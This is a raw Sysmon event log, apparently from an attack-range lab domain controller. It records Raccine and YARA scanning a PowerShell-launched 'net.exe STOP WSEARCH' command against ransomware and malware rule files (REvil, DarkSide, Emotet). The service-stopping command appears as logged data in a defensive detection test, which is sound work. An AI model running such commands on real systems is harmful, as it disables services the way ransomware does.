-d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246953Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.894{9DBE88B5-5575-61B2-FD08-010000000E02}81085292C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-FC08-010000000E02}6924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246947Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.883{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-FC08-010000000E02}6924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246946Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.882{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-FC08-010000000E02}6924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246945Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.883{9DBE88B5-5575-61B2-FC08-010000000E02}6924C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246942Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.867{9DBE88B5-5575-61B2-FB08-010000000E02}16207400C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-FA08-010000000E02}7888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246936Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.855{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-FA08-010000000E02}7888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246935Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.855{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-FA08-010000000E02}7888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246934Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.855{9DBE88B5-5575-61B2-FA08-010000000E02}7888C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246931Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.839{9DBE88B5-5575-61B2-F908-010000000E02}56644640C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-F808-010000000E02}6752C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246925Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.828{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-F808-010000000E02}6752C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246924Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.828{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-F808-010000000E02}6752C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246923Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.828{9DBE88B5-5575-61B2-F808-010000000E02}6752C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246920Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.813{9DBE88B5-5575-61B2-F708-010000000E02}6300208C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-F608-010000000E02}8140C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246914Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.801{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-F608-010000000E02}8140C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246913Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.801{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-F608-010000000E02}8140C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246912Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.801{9DBE88B5-5575-61B2-F608-010000000E02}8140C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246909Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.785{9DBE88B5-5575-61B2-F508-010000000E02}19644100C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-F408-010000000E02}7804C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246903Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.774{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-F408-010000000E02}7804C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246902Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.774{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-F408-010000000E02}7804C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246901Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.774{9DBE88B5-5575-61B2-F408-010000000E02}7804C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246897Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.758{9DBE88B5-5575-61B2-F308-010000000E02}75647692C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-F208-010000000E02}7356C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246891Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.747{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-F208-010000000E02}7356C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246890Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.747{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-F208-010000000E02}7356C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246889Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.746{9DBE88B5-5575-61B2-F208-010000000E02}7356C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246886Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.730{9DBE88B5-5575-61B2-F108-010000000E02}35247308C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-F008-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246880Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.719{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-F008-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246879Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.719{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-F008-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246878Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.719{9DBE88B5-5575-61B2-F008-010000000E02}7680C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246874Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.703{9DBE88B5-5575-61B2-EF08-010000000E02}53684508C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-EE08-010000000E02}5780C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246868Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.691{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-EE08-010000000E02}5780C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246867Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.690{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-EE08-010000000E02}5780C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246866Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.690{9DBE88B5-5575-61B2-EE08-010000000E02}5780C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246864Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.687{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program 